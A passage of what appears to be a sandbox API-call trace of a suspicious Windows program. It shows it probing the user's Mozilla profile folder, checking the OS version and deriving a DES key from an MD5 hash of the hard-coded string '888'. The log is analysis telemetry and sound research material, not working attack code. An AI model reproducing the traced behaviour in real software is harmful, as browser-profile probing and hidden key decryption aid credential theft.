Flags=0x0, Size=0x4) returned 0x2a72238 [0174.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0174.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0174.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0174.632] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0174.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0174.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0174.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0174.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0174.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0174.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0174.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0174.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0174.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0174.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0174.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0174.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0174.633] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Mozilla", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9067e6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfa9067e6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x190eac40, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 0x9e1b78 [0174.633] FindClose (in: hFindFile=0x9e1b78 | out: hFindFile=0x9e1b78) returned 1 [0174.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0174.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0174.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0174.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0174.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0174.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0174.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0174.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0174.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0174.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0174.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0174.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.635] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0174.635] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0174.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0174.636] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0174.636] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0174.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0174.637] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0174.637] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0174.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0174.638] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0174.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0174.638] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0174.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0174.638] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.638] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0174.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0174.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0174.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0174.639] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c550) returned 1 [0174.640] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0174.640] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0174.640] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0174.640] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0174.640] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0174.640] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0174.640] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0174.640] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0174.641] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0174.641] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0174.641] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0174.641] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0174.641] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.641] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.641] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0174.641] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0174.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0174.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaaca8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0174.642] CryptCreateHash (in: hProv=0xa7c550, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0174.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0174.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72778, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0174.642] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0174.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0174.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0174.642] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.642] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0174.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaac48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0174.642] CryptHashData (hHash=0x9e2238, pbData=0x2a72718, dwDataLen=0x3, dwFlags=0x1) returned 1 [0174.642] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.642] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.642] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0174.642] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0174.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0174.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaabd0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0174.643] CryptDeriveKey (in: hProv=0xa7c550, Algid=0x6601, hBaseData=0x9e2238, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1b78) returned 1 [0174.643] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.643] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0174.643] WideCharToMultiByte 